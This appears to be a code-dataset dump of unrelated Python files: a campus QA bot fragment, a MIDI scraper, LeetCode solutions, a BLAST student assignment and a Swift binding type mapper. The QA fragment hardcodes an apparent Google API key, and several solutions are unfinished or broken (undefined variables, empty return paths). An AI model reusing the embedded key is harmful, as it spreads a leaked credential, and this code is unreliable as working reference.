room[\"number\"])\n answer[\"answer_messages\"].append(employee_str)\n else:\n answer[\"answer_type\"] = \"string\"\n answer[\"answer_messages\"].append(\"Sorry, it's not in our database. Please check your spelling.\")\n return answer\n\n\ndef answer_frompassage(question):\n answer = {\"answer_type\": None, \"answer_messages\": [], \"answer_locations\": [], \"answer_obj\": None}\n from googleapiclient.discovery import build\n service = build(\"customsearch\", 'v1',developerKey=\"AIzaSyDjsBfa0igZZQUL6gMdDKEMIGsX6j-2HVA\")\n res = service.cse().list(q=question, cx=\"006188269277128775091:loi0aooxt4w\").execute()\n answer[\"answer_type\"] = \"url\"\n answer[\"answer_messages\"].append(res[\"url\"])\n return answer\n\ndef answer_url(question):\n answer = {\"answer_type\": None, \"answer_messages\": [], \"answer_locations\": [], \"answer_obj\": None}\n urlsearch = \"https://www.google.com/search?q=site%3Afit.edu+\" + question.replace(\" \", \"+\").lower()\n answer[\"answer_type\"] = \"url\"\n answer[\"answer_messages\"].append(urlsearch)\n return answer\n\n\ndef small_talk(question):\n answer = {\"answer_type\": None, \"answer_messages\": [], \"answer_locations\": [], \"answer_obj\": None}\n\n # Initialize API.AI client\n\n client = apiai.ApiAI(APIAI_CLIENT_ACCESS_TOKEN)\n\n # Create new request\n\n request = client.text_request()\n request.query = question\n\n # Receive response and convert it to JSON\n\n response = request.getresponse()\n\n\n answer[\"answer_type\"] = \"string\"\n answer[\"answer_messages\"].append(json.loads(response.read().decode())[\"result\"][\"fulfillment\"][\"speech\"])\n\n return answer\n\n\n\n\n","sub_path":"website/FIT_QA_SYSTEM/QA/question_answering.py","file_name":"question_answering.py","file_ext":"py","file_size_in_byte":12844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"506089969","text":"import random\n\n\ndef has_duplicates(the_list):\n \"\"\"Using lists, read in 30 numbers and print out whether the number read is a duplicate of a previous number.\"\"\"\n\n previous = []\n for i in the_list:\n if i in previous:\n print(i, \"is a duplicate\")\n else:\n print(i)\n previous.append(i)\n\n\nif __name__ == '__main__':\n my_list = [random.randint(1, 100) for k in range(30)]\n has_duplicates(my_list)\n","sub_path":"Final/duplicates.py","file_name":"duplicates.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"489249766","text":"import re\r\n\r\nimport requests\r\nfrom lxml import etree\r\n\r\nmapname = {}\r\nbasepath = r'C:\\Users\\v-jiaxwa\\Desktop\\4'\r\nr1 = requests.get('http://en.midimelody.ru/category/midi-melodies/')\r\nwhile 1:\r\n html = r1.text\r\n data = etree.HTML(html)\r\n ls_downpage = data.xpath('//h3/a/@href')\r\n\r\n for k in range(len(ls_downpage)):\r\n r2 = requests.get(ls_downpage[k])\r\n data2 = etree.HTML(r2.text)\r\n templs = data2.xpath('//div[@class=\"div_tab_rows\"]/p/span/a')\r\n str_name = ''\r\n for i in range(len(templs)):\r\n str_name = templs[i].text\r\n str_name = re.sub(r\"[^A-Za-z0-9.\\-]\", '', str(str_name)).replace(\".mid\", '')\r\n if str_name in mapname.keys():\r\n str_name = mapname[str_name] + 1\r\n else:\r\n mapname[str_name] = 0\r\n headers = {\r\n 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'}\r\n headers.update({\"Referer\": ls_downpage[k]})\r\n r = requests.get('http://en.midimelody.ru'+str(templs[i].xpath('@href')[0]),\r\n timeout=5,\r\n headers=headers)\r\n with open(basepath + '\\\\' + str(str_name) + '.mid', 'wb') as f:\r\n print(str(str_name))\r\n f.write(r.content)\r\n try:\r\n next_url = data.xpath('//*[@id=\"content\"]//div[@class=\"navigation\"]/a[@class=\"next page-numbers\"]/@href')[0]\r\n r1 = requests.get(next_url)\r\n except:\r\n break\r\nprint(\"Done!\")\r\n","sub_path":"ceshixiazai.py","file_name":"ceshixiazai.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"86884936","text":"\"\"\"\r\nhard 2021-12-.... 区间dp(区间DP)(字节)\r\nhttps://leetcode-cn.com/problems/minimum-cost-to-merge-stones/solution/yi-dong-you-yi-dao-nan-yi-bu-bu-shuo-ming-si-lu-he/\r\n-\r\n- i-j前缀的和为 nums[i...j]=sum[j]-sum[i-1]\r\n\r\n\"\"\"\r\n# dp[i,j]=所有将[i,j]合并为一堆的方案。\r\n# 定义状态转移方程:最常见的写法为:\r\n# dp[i,j] = max/min{dp[i,j], dp[i, k] + dp[k+1, j] + cost}。 ## 分界点k到底划还是不划\r\n# 选取[i, j]之间的一个分界点k,分别计算[i, k]和[k+1, j]的最优解,从而组合出[i, j]的最优解。\r\n\r\n# 枚举i为子区间左边界,枚举j为子区间有边界,枚举k为分界点。\r\n# 要注意由于要求的是dp[1,n],所以i必须从大往小遍历,j必须从小往大遍历。这样在状态转移方程中利用的就是已求解的dp状态。\r\nclass Solution:\r\n def mergeStones(self, stones, k):\r\n # 计算前缀和\r\n n = len(stones)\r\n preSum = [0 for _ in range(n+1)]\r\n # sum(i, j) = preSum[j + 1] - preSum[i]快速求区间和\r\n for i in range(n):\r\n preSum[i + 1] = preSum[i] + stones[i]\r\n # print(preSum) # [0, 3, 8, 9, 11, 17]\r\n\r\n dp = [[0 for _ in range(n + 1)] for _ in range(n + 1)]\r\n # 至少要剩余2堆才能进行合并\r\n for x in range(2, n+1):\r\n\r\n for k in range(i, j):\r\n dp[i][j]=min(dp[i][j], dp[i][k]+dp[k+1][j]+sums[j]-sums[i-1])\r\n\r\nif __name__ == '__main__':\r\n stones = [3,5,1,2,6]\r\n K = 3\r\n print(Solution().mergeStones(stones, K))\r\n","sub_path":"07_动态规划/区间DP/1000-合并石头的最低成本.py","file_name":"1000-合并石头的最低成本.py","file_ext":"py","file_size_in_byte":1555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"47580275","text":"import numpy as np\nimport sys\n\nfrom pathlib import Path\nfrom collections import defaultdict\n\nimport time\n\n\n\"\"\"\nATTENTION: Use the following dictionaries to get the correct index for each\n amino acid when accessing any type of matrix (PSSM or substitution\n matrix) parameters. Failure to do so will most likely result in not\n passing the tests.\n\"\"\"\nALPHABET = 'ACDEFGHIKLMNPQRSTVWY'\nAA_TO_INT = {aa: index for index, aa in enumerate(ALPHABET)}\nINT_TO_AA = {index: aa for index, aa in enumerate(ALPHABET)}\n\nclass DatabaseObj:\n seq = \"\"\n\n def __init__(self, seq):\n if seq is not None:\n self.seq = seq\n else:\n self.seq = \"\"\n\n def contains(self, word):\n return self.seq.__contains__(word)\n\n def all_indices(self, sub, offset=0):\n list_index = []\n i = self.seq.find(sub, offset)\n while i >= 0:\n list_index.append(i)\n i = self.seq.find(sub, i + 1)\n return list_index\n\nclass Database:\n sequences = []\n word_size = -1\n seq_word_dict = defaultdict(lambda: defaultdict(list))\n\n def __init__(self, word_size):\n self.word_size = word_size\n pass\n\n def append(self, seq):\n self.sequences.append(DatabaseObj(seq))\n seq_index = len(self.sequences) - 1\n for i in range(len(seq) - (self.word_size - 1)):\n self.seq_word_dict[seq[i:i + self.word_size]][seq_index].append(i)\n pass\n\n def get_containing(self, word):\n unique = np.zeros(len(self.sequences))\n seq_dict = self.seq_word_dict[word]\n\n result = []\n\n for x in seq_dict:\n result.append(self.sequences[x].seq)\n\n return result\n\n def count_distinct_words_in_seq(self):\n sum = 0\n\n for single_dict in self.seq_word_dict.values():\n sum += len(single_dict)\n\n return sum\n\n def db_stats(self):\n distinct_count = self.count_distinct_words_in_seq()\n\n result = (len(self.sequences), len(self.seq_word_dict),\n int(round(distinct_count/len(self.sequences))),\n int(round(distinct_count/len(self.seq_word_dict))))\n\n return result\n\n def current_millis(self):\n return lambda: int(round(time.time() * 1000))\n\n\nclass BlastDb:\n\n def __init__(self):\n \"\"\"\n Initialize the BlastDb class.\n \"\"\"\n self.db = Database(3)\n\n pass\n\n def add_sequence(self, sequence):\n \"\"\"\n Add a sequence to the database.\n\n :param sequence: a protein sequence (string).\n \"\"\"\n\n self.db.append(sequence)\n\n def get_sequences(self, word):\n \"\"\"\n Return all sequences in the database containing a given word.\n\n :param word: a word (string).\n\n :return: List with sequences.\n \"\"\"\n\n return self.db.get_containing(word)\n\n def get_db_stats(self):\n \"\"\"\n Return some database statistics:\n - Number of sequences in database\n - Number of different words in database\n - Average number of words per sequence (rounded to nearest int)\n - Average number of sequences per word (rounded to nearest int)\n\n :return: Tuple with four integer numbers corrsponding to the mentioned\n statistics (in order of listing above).\n \"\"\"\n return self.db.db_stats()\n\n\nclass Blast:\n\n def __init__(self, substitution_matrix):\n \"\"\"\n Initialize the Blast class with the given substitution_matrix.\n\n :param substitution_matrix: 20x20 amino acid substitution score matrix.\n \"\"\"\n\n self.sub_matrix = substitution_matrix\n self.word_size = 3\n pass\n\n def get_words(self, *, sequence=None, pssm=None, T=11):\n \"\"\"\n Return all words with score >= T for given protein sequence or PSSM.\n Only a sequence or PSSM will be provided, not both at the same time.\n A word may only appear once in the list.\n\n :param sequence: a protein sequence (string).\n :param pssm: a PSSM (Lx20 matrix, where L is length of sequence).\n :param T: score threshold T for the words.\n\n :return: List of unique words.\n \"\"\"\n\n result = {}\n\n if sequence is not None:\n unique_input_words = self.get_unique_words(sequence)\n\n for single_word in unique_input_words:\n subs = defaultdict(list)\n base_score = self.get_score_three_word(single_word, single_word)\n for i in range(len(single_word)):\n subs[i] = self.get_substitutes_for(single_word[i], base_score - T)\n\n found_sub_candidate = self.build_word_from_dict(subs)\n\n # check if new words all have high enough score\n for candidate in found_sub_candidate:\n if self.get_score_three_word(single_word, candidate) >= T:\n result[candidate] = 1\n elif pssm is not None:\n dict = {}\n for i in range(len(pssm)):\n dict[i] = self.get_worthy_char_from_row(pssm[i])\n\n found_sub_candidate = []\n for i in range(len(pssm) - (self.word_size - 1)):\n for possible_candidate in self.build_word_from_dict(dict, i):\n if self.get_pssm_score_for_word(pssm, i, possible_candidate) >= T:\n result[possible_candidate] = 1\n\n return result.keys()\n\n def get_unique_words(self, seq):\n dict = {}\n for i in range(len(seq) - (self.word_size - 1)):\n dict[seq[i:i + self.word_size]] = 1\n\n return dict.keys()\n\n def get_score_three_word(self, from_word, to_word):\n return self.sub_matrix[AA_TO_INT[from_word[0]]][AA_TO_INT[to_word[0]]] +\\\n self.sub_matrix[AA_TO_INT[from_word[1]]][AA_TO_INT[to_word[1]]] +\\\n self.sub_matrix[AA_TO_INT[from_word[2]]][AA_TO_INT[to_word[2]]]\n\n def get_substitutes_for(self, character, threshold):\n row = self.sub_matrix[AA_TO_INT[character]]\n own_sub = row[AA_TO_INT[character]]\n\n result = []\n\n for i in range(len(row)):\n if own_sub - row[i] <= threshold:\n result.append(INT_TO_AA[i])\n\n return result\n\n def build_word_from_dict(self, dict, start=0):\n result = [\"\"]\n\n #for i in range(len(dict)):\n for i in range(start, start + self.word_size):\n\n new_result = []\n for part in result:\n for new_char in dict[i]:\n new_result.append(part + new_char)\n\n result = new_result\n\n return result\n\n def get_worthy_word_from_pssm(self, pssm):\n pass\n\n def get_worthy_char_from_row(self, row):\n result = []\n min = - 5\n\n for i in range(len(row)):\n if row[i] >= min:\n result.append(INT_TO_AA[i])\n\n return result\n\n def get_pssm_score(self, pssm, i, char):\n return pssm[i][AA_TO_INT[char]]\n\n def get_pssm_score_for_word(self, pssm, start, str):\n counter = 0\n sum = 0\n\n for char in str:\n sum += self.get_pssm_score(pssm, start + counter, char)\n counter += 1\n\n return sum\n\n def search_one_hit(self, blast_db, *, query=None, pssm=None, T=13, X=5, S=30):\n \"\"\"\n Search a database for target sequences with a given query sequence or\n PSSM. Return a dictionary where the keys are the target sequences for\n which HSPs have been found and the corresponding values are lists of\n tuples. Each tuple is a HSP with the following elements (and order):\n - Start position of HSP in query sequence\n - Start position of HSP in target sequence\n - Length of the HSP\n - Total score of the HSP\n The same HSP may not appear twice in the list (remove duplictes).\n Only a sequence or PSSM will be provided, not both at the same time.\n\n :param blast_db: BlastDB class object with protein sequences.\n :param query: query protein sequence.\n :param pssm: query PSSM (Lx20 matrix, where L is length of sequence).\n :param T: score threshold T for the words.\n :param X: drop-off threshold X during extension.\n :param S: score threshold S for the HSP.\n\n :return: dictionary of target sequences and list of HSP tuples.\n \"\"\"\n d = dict()\n d['SEQWENCE'] = [(1, 2, 4, 13)]\n\n def search_two_hit(self, blast_db, *, query=None, pssm=None, T=11, X=5, S=30, A=40):\n \"\"\"\n Search a database for target sequences with a given query sequence or\n PSSM. Return a dictionary where the keys are the target sequences for\n which HSPs have been found and the corresponding values are lists of\n tuples. Each tuple is a HSP with the following elements (and order):\n - Start position of HSP in query sequence\n - Start position of HSP in target sequence\n - Length of the HSP\n - Total score of the HSP\n The same HSP may not appear twice in the list (remove duplictes).\n Only a sequence or PSSM will be provided, not both at the same time.\n\n :param blast_db: BlastDB class object with protein sequences.\n :param query: query protein sequence.\n :param pssm: query PSSM (Lx20 matrix, where L is length of sequence).\n :param T: score threshold T for the words.\n :param X: drop-off threshold X during extension.\n :param S: score threshold S for the HSP.\n :param A: max distance A between two hits for the two-hit method.\n\n :return: dictionary of target sequences and list of HSP tuples.\n \"\"\"\n d = dict()\n d['SEQWENCE'] = [(1, 2, 4, 13)]\n","sub_path":"codechecker/repos/5/collected_files/blast/ga63waz.py","file_name":"ga63waz.py","file_ext":"py","file_size_in_byte":9796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"569253995","text":"from src.binding_types import TypeInfo\nfrom src.type_parsing_regeces import TypeParsingRegeces\n\nvar_is_arr_regex = TypeParsingRegeces.IS_VARIABLE_AN_ARRAY_REGEX\nvar_ty_regex = TypeParsingRegeces.VARIABLE_TYPE_REGEX\n\n\ndef map_types_to_swift(fn_arg, ret_arr_len, java_c_types_none_allowed, tuple_types, unitary_enums, language_constants):\n\tunaltered_function_argument = fn_arg # if necessary\n\tfn_arg = fn_arg.strip()\n\tnon_nullable = False\n\tif fn_arg.startswith(\"MUST_USE_RES \"):\n\t\tfn_arg = fn_arg[13:]\n\tis_const = False\n\tif fn_arg.startswith(\"const \"):\n\t\tfn_arg = fn_arg[6:]\n\t\tis_const = True\n\tif fn_arg.startswith(\"struct \"):\n\t\tfn_arg = fn_arg[7:]\n\tif fn_arg.startswith(\"enum \"):\n\t\tfn_arg = fn_arg[5:]\n\tif 'NONNULL_PTR' in fn_arg:\n\t\tnon_nullable = True\n\tfn_arg = fn_arg.replace(\"NONNULL_PTR\", \"\")\n\n\tstripped_function_argument = fn_arg\n\n\tis_ptr = False\n\ttake_by_ptr = False\n\trust_obj = None\n\tarr_access = None\n\n\t# the way that a type is represented in Swift, typically for humans and machines\n\tswift_type = None\n\n\t# the way that Swift automatically maps C types when divergent from what people use, like const char * not being a String\n\tswift_raw_type = None\n\n\tif fn_arg.startswith(\"LDKThirtyTwoBytes\"):\n\t\tfn_arg = \"uint8_t (*\" + fn_arg[18:] + \")[32]\"\n\t\tassert var_is_arr_regex.match(fn_arg[8:])\n\t\trust_obj = \"LDKThirtyTwoBytes\"\n\t\tswift_raw_type = rust_obj\n\t\tarr_access = \"data\"\n\telif fn_arg.startswith(\"LDKPublicKey\"):\n\t\tfn_arg = \"uint8_t (*\" + fn_arg[13:] + \")[33]\"\n\t\tassert var_is_arr_regex.match(fn_arg[8:])\n\t\trust_obj = \"LDKPublicKey\"\n\t\tswift_raw_type = rust_obj\n\t\tarr_access = \"compressed_form\"\n\telif fn_arg.startswith(\"LDKSecretKey\"):\n\t\tfn_arg = \"uint8_t (*\" + fn_arg[13:] + \")[32]\"\n\t\tassert var_is_arr_regex.match(fn_arg[8:])\n\t\trust_obj = \"LDKSecretKey\"\n\t\tswift_raw_type = rust_obj\n\t\tarr_access = \"bytes\"\n\telif fn_arg.startswith(\"LDKSignature\"):\n\t\tfn_arg = \"uint8_t (*\" + fn_arg[13:] + \")[64]\"\n\t\tassert var_is_arr_regex.match(fn_arg[8:])\n\t\trust_obj = \"LDKSignature\"\n\t\tswift_raw_type = rust_obj\n\t\tarr_access = \"compact_form\"\n\telif fn_arg.startswith(\"LDKThreeBytes\"):\n\t\tfn_arg = \"uint8_t (*\" + fn_arg[14:] + \")[3]\"\n\t\tassert var_is_arr_regex.match(fn_arg[8:])\n\t\trust_obj = \"LDKThreeBytes\"\n\t\tswift_raw_type = rust_obj\n\t\tarr_access = \"data\"\n\telif fn_arg.startswith(\"LDKFourBytes\"):\n\t\tfn_arg = \"uint8_t (*\" + fn_arg[13:] + \")[4]\"\n\t\tassert var_is_arr_regex.match(fn_arg[8:])\n\t\trust_obj = \"LDKFourBytes\"\n\t\tswift_raw_type = rust_obj\n\t\tarr_access = \"data\"\n\telif fn_arg.startswith(\"LDKTenBytes\"):\n\t\tfn_arg = \"uint8_t (*\" + fn_arg[12:] + \")[10]\"\n\t\tassert var_is_arr_regex.match(fn_arg[8:])\n\t\trust_obj = \"LDKTenBytes\"\n\t\tswift_raw_type = rust_obj\n\t\tarr_access = \"data\"\n\telif fn_arg.startswith(\"LDKSixteenBytes\"):\n\t\tfn_arg = \"uint8_t (*\" + fn_arg[16:] + \")[16]\"\n\t\tassert var_is_arr_regex.match(fn_arg[8:])\n\t\trust_obj = \"LDKSixteenBytes\"\n\t\tswift_raw_type = rust_obj\n\t\tarr_access = \"data\"\n\telif fn_arg.startswith(\"LDKTwentyBytes\"):\n\t\tfn_arg = \"uint8_t (*\" + fn_arg[15:] + \")[20]\"\n\t\tassert var_is_arr_regex.match(fn_arg[8:])\n\t\trust_obj = \"LDKTwentyBytes\"\n\t\tswift_raw_type = rust_obj\n\t\tarr_access = \"data\"\n\telif fn_arg.startswith(\"LDKRecoverableSignature\"):\n\t\tfn_arg = \"uint8_t (*serialized_form)[68]\"\n\t\tassert var_is_arr_regex.match(fn_arg[8:])\n\t\trust_obj = \"LDKRecoverableSignature\"\n\t\tswift_raw_type = rust_obj\n\t\tarr_access = \"serialized_form\"\n\telif fn_arg.startswith(\"LDKu8slice\"):\n\t\tfn_arg = \"uint8_t (*\" + fn_arg[11:] + \")[datalen]\"\n\t\tassert var_is_arr_regex.match(fn_arg[8:])\n\t\trust_obj = \"LDKu8slice\"\n\t\tarr_access = \"data\"\n\telif fn_arg.startswith(\"LDKCVec_u8Z\"):\n\t\tfn_arg = \"uint8_t (*\" + fn_arg[12:] + \")[datalen]\"\n\t\trust_obj = \"LDKCVec_u8Z\"\n\t\tswift_raw_type = rust_obj\n\t\tassert var_is_arr_regex.match(fn_arg[8:])\n\t\tarr_access = \"data\"\n\telif fn_arg.startswith(\"LDKTransaction \") or fn_arg == \"LDKTransaction\":\n\t\tfn_arg = \"uint8_t (*\" + fn_arg[15:] + \")[datalen]\"\n\t\trust_obj = \"LDKTransaction\"\n\t\tswift_raw_type = rust_obj\n\t\tassert var_is_arr_regex.match(fn_arg[8:])\n\t\tarr_access = \"data\"\n\telif fn_arg.startswith(\"LDKCVec_\"):\n\t\tis_ptr = False\n\t\tif \"*\" in fn_arg:\n\t\t\tfn_arg = fn_arg.replace(\"*\", \"\")\n\t\t\tis_ptr = True\n\n\t\ttyn = fn_arg[8:].split(\" \")\n\t\tassert tyn[0].endswith(\"Z\")\n\t\tif tyn[0] == \"u64Z\":\n\t\t\tnew_arg = \"uint64_t\"\n\t\telse:\n\t\t\tnew_arg = \"LDK\" + tyn[0][:-1]\n\t\tfor a in tyn[1:]:\n\t\t\tnew_arg = new_arg + \" \" + a\n\t\tres = map_types_to_swift(new_arg, ret_arr_len, java_c_types_none_allowed, tuple_types, unitary_enums, language_constants)\n\t\tif res is None:\n\t\t\tassert java_c_types_none_allowed\n\t\t\treturn None\n\t\tif is_ptr:\n\t\t\tres.pass_by_ref = True\n\t\tif res.is_native_primitive or res.passed_as_ptr:\n\t\t\treturn TypeInfo(rust_obj=fn_arg.split(\" \")[0], swift_type=f'[{res.swift_type}]', c_ty=res.c_ty + \"Array\", passed_as_ptr=False, is_ptr=is_ptr, is_const=is_const, var_name=res.var_name,\n\t\t\t\t\t\t\tarr_len=\"datalen\", arr_access=\"data\", subty=res, is_native_primitive=False, non_nullable=non_nullable)\n\t\telse:\n\t\t\treturn TypeInfo(rust_obj=fn_arg.split(\" \")[0], swift_type=f'[{res.swift_type}]', c_ty=language_constants.ptr_arr, passed_as_ptr=False, is_ptr=is_ptr, is_const=is_const,\n\t\t\t\t\t\t\tvar_name=res.var_name, arr_len=\"datalen\", arr_access=\"data\", subty=res, is_native_primitive=False, non_nullable=non_nullable)\n\n\tis_primitive = False\n\tarr_len = None\n\tis_unary_tuple = False\n\tjava_type_plural = None\n\tif fn_arg.startswith(\"void\"):\n\t\tjava_ty = \"Void\"\n\t\tc_ty = \"void\"\n\t\tfn_arg = fn_arg[4:].strip()\n\t\tis_primitive = True\n\telif fn_arg.startswith(\"bool\"):\n\t\tjava_ty = \"boolean\"\n\t\tc_ty = \"jboolean\"\n\t\tswift_type = 'Bool'\n\t\tfn_arg = fn_arg[4:].strip()\n\t\tis_primitive = True\n\telif fn_arg.startswith(\"uint8_t\"):\n\t\tmapped_type = language_constants.c_type_map['uint8_t']\n\t\tjava_ty = mapped_type\n\t\tc_ty = \"int8_t\"\n\t\tfn_arg = fn_arg[7:].strip()\n\t\tis_primitive = True\n\telif fn_arg.startswith(\"LDKu5\"):\n\t\tmapped_type = language_constants.c_type_map['uint8_t']\n\t\tjava_ty = mapped_type\n\t\tc_ty = \"int8_t\"\n\t\tfn_arg = fn_arg[6:].strip()\n\t\trust_obj = 'LDKu5'\n\t\tis_unary_tuple = True\n\t\tarr_len = 1\n\t\tis_primitive = True\n\telif fn_arg.startswith(\"uint16_t\"):\n\t\tmapped_type = language_constants.c_type_map['uint16_t']\n\t\tjava_ty = mapped_type\n\t\tc_ty = \"int16_t\"\n\t\tfn_arg = fn_arg[8:].strip()\n\t\tis_primitive = True\n\telif fn_arg.startswith(\"uint32_t\"):\n\t\tmapped_type = language_constants.c_type_map['uint32_t']\n\t\tjava_ty = mapped_type\n\t\tc_ty = \"int32_t\"\n\t\tfn_arg = fn_arg[8:].strip()\n\t\tis_primitive = True\n\telif fn_arg.startswith(\"uint64_t\") or fn_arg.startswith(\"uintptr_t\"):\n\t\t# TODO: uintptr_t is arch-dependent :(\n\t\tmapped_type = language_constants.c_type_map['uint64_t']\n\t\tjava_ty = mapped_type\n\t\tif fn_arg.startswith(\"uint64_t\"):\n\t\t\tc_ty = \"int64_t\"\n\t\t\tfn_arg = fn_arg[8:].strip()\n\t\telse:\n\t\t\tc_ty = \"int64_t\"\n\t\t\trust_obj = \"uintptr_t\"\n\t\t\tswift_type = 'UInt'\n\t\t\tfn_arg = fn_arg[9:].strip()\n\t\tis_primitive = True\n\telif is_const and fn_arg.startswith(\"char *\"):\n\t\tjava_ty = \"String\"\n\t\tc_ty = \"const char*\"\n\t\tswift_raw_type = 'UnsafePointer'\n\t\tfn_arg = fn_arg[6:].strip()\n\telif fn_arg.startswith(\"LDKStr\"):\n\t\tjava_ty = \"String\"\n\t\tc_ty = \"jstring\"\n\t\tfn_arg = fn_arg[6:].strip()\n\t\tarr_access = \"chars\"\n\t\tarr_len = \"len\"\n\telse:\n\t\tma = var_ty_regex.match(fn_arg)\n\t\ttype_match = ma.group(1).strip()\n\t\tname_match = ma.group(2).strip()\n\t\tif type_match in unitary_enums:\n\t\t\tjava_ty = type_match\n\t\t\tc_ty = language_constants.result_c_ty\n\t\t\tswift_type = type_match\n\t\t\tswift_raw_type = type_match\n\t\t\tfn_arg = name_match\n\t\t\trust_obj = type_match\n\t\telif type_match.startswith(\"LDKC2Tuple\"):\n\t\t\tc_ty = language_constants.ptr_c_ty\n\t\t\tjava_ty = language_constants.ptr_native_ty\n\t\t\tswift_type = type_match[3:]\n\t\t\t# swift_type = \"TwoTuple<\"\n\t\t\t# if not type_match in tuple_types:\n\t\t\t# \tassert java_c_types_none_allowed\n\t\t\t# \treturn None\n\t\t\t# for idx, ty_info in enumerate(tuple_types[type_match][0]):\n\t\t\t# \tif idx != 0:\n\t\t\t# \t\tswift_type = swift_type + \", \"\n\t\t\t# \tif ty_info.is_native_primitive:\n\t\t\t# \t\tif ty_info.swift_type == \"int\":\n\t\t\t# \t\t\tswift_type = swift_type + \"Integer\" # Java concrete integer type is Integer, not Int\n\t\t\t# \t\telse:\n\t\t\t# \t\t\tswift_type = swift_type + ty_info.swift_type.title() # If we're a primitive, capitalize the first letter\n\t\t\t# \telse:\n\t\t\t# \t\tswift_type = swift_type + ty_info.swift_type\n\t\t\t# swift_type = swift_type + \">\"\n\t\t\tfn_arg = name_match\n\t\t\trust_obj = type_match\n\t\t\ttake_by_ptr = True\n\t\telif type_match.startswith(\"LDKC3Tuple\"):\n\t\t\tc_ty = language_constants.ptr_c_ty\n\t\t\tjava_ty = language_constants.ptr_native_ty\n\t\t\tswift_type = type_match[3:]\n\t\t\t# swift_type = \"ThreeTuple<\"\n\t\t\t# if not type_match in tuple_types:\n\t\t\t# \tassert java_c_types_none_allowed\n\t\t\t# \treturn None\n\t\t\t# for idx, ty_info in enumerate(tuple_types[type_match][0]):\n\t\t\t# \tif idx != 0:\n\t\t\t# \t\tswift_type = swift_type + \", \"\n\t\t\t# \tif ty_info.is_native_primitive:\n\t\t\t# \t\tif ty_info.java_hu_ty == \"int\":\n\t\t\t# \t\t\tswift_type = swift_type + \"Integer\" # Java concrete integer type is Integer, not Int\n\t\t\t# \t\telse:\n\t\t\t# \t\t\tswift_type = swift_type + ty_info.java_hu_ty.title() # If we're a primitive, capitalize the first letter\n\t\t\t# \telse:\n\t\t\t# \t\tswift_type = swift_type + ty_info.swift_type\n\t\t\t# swift_type = swift_type + \">\"\n\t\t\tfn_arg = name_match\n\t\t\trust_obj = type_match\n\t\t\ttake_by_ptr = True\n\t\telse:\n\t\t\tc_ty = language_constants.ptr_c_ty\n\t\t\tjava_ty = language_constants.ptr_native_ty\n\t\t\tswift_type = type_match.replace(\"LDKCResult\", \"Result\").replace(\"LDKCOption\", \"Option\").replace(\"LDK\", \"\")\n\t\t\tfn_arg = name_match\n\t\t\trust_obj = type_match\n\t\t\ttake_by_ptr = True\n\n\tif fn_arg.startswith(\" *\") or fn_arg.startswith(\"*\"):\n\t\tfn_arg = fn_arg.replace(\"*\", \"\").strip()\n\t\tis_ptr = True\n\t\tc_ty = language_constants.ptr_c_ty\n\t\tjava_ty = language_constants.ptr_native_ty\n\n\tis_constant_size_array = TypeParsingRegeces.IS_VARIABLE_A_FIXED_SIZE_ARRAY_REGEX.match(stripped_function_argument)\n\tif is_constant_size_array is not None:\n\t\tfn_arg = is_constant_size_array.group(1)\n\t\tarray_size = int(is_constant_size_array.group(2))\n\t\tarr_len = array_size\n\t\tswift_raw_type = f'({\",\".join([mapped_type] * array_size)})'\n\n\t# TODO: remove java_hu_type vs java_type duality artifact\n\tvar_is_arr = var_is_arr_regex.match(fn_arg)\n\tif var_is_arr is not None or ret_arr_len is not None:\n\t\tassert (not take_by_ptr)\n\t\tassert (not is_ptr)\n\t\t# is there a special case for plurals?\n\t\tjava_ty = '[' + java_ty + ']'\n\t\tc_ty = c_ty + \"Array\"\n\t\tif ret_arr_len is not None and ret_arr_len.isnumeric():\n\t\t\tarray_size = int(ret_arr_len)\n\t\t\tarr_len = array_size\n\t\t\tswift_raw_type = f'({\",\".join([mapped_type] * array_size)})'\n\t\tif var_is_arr is not None:\n\t\t\tarray_size = var_is_arr.group(2)\n\t\t\tif array_size.isnumeric():\n\t\t\t\tarray_size = int(var_is_arr.group(2))\n\t\t\t\tswift_raw_type = f'({\",\".join([mapped_type] * array_size)})'\n\t\t\tif var_is_arr.group(1) == \"\":\n\t\t\t\treturn TypeInfo(rust_obj=rust_obj, swift_type=java_ty, c_ty=c_ty, is_const=is_const, passed_as_ptr=False, is_ptr=False, var_name=\"arg\", arr_len=var_is_arr.group(2),\n\t\t\t\t\t\t\t\tarr_access=arr_access, is_native_primitive=False, swift_raw_type=swift_raw_type, non_nullable=non_nullable, is_unary_tuple=is_unary_tuple)\n\t\t\treturn TypeInfo(rust_obj=rust_obj, swift_type=java_ty, c_ty=c_ty, is_const=is_const, passed_as_ptr=False, is_ptr=False, var_name=var_is_arr.group(1), arr_len=var_is_arr.group(2),\n\t\t\t\t\t\t\tarr_access=arr_access, is_native_primitive=False, swift_raw_type=swift_raw_type, non_nullable=non_nullable, is_unary_tuple=is_unary_tuple)\n\n\tif swift_type is None:\n\t\tswift_type = java_ty\n\treturn TypeInfo(rust_obj=rust_obj, swift_type=swift_type, c_ty=c_ty, passed_as_ptr=is_ptr or take_by_ptr, is_const=is_const, is_ptr=is_ptr, var_name=fn_arg, arr_len=arr_len, arr_access=arr_access,\n\t\t\t\t\tis_native_primitive=is_primitive, swift_raw_type=swift_raw_type, non_nullable=non_nullable, is_unary_tuple=is_unary_tuple)\n","sub_path":"src/swift_type_mapper.py","file_name":"swift_type_mapper.py","file_ext":"py","file_size_in_byte":11698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"23071442","text":"class Solution(object):\n def groupAnagrams(self, strs):\n \"\"\"\n :type strs: List[str]\n :rtype: List[List[str]]\n \"\"\"\n anagrams = defaultdict(list)\n for word in strs:\n anagrams[''.join(sorted(word))].append(word)\n return list(anagrams.values())\n","sub_path":"Algorithms/Group Anagrams.py","file_name":"Group Anagrams.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} 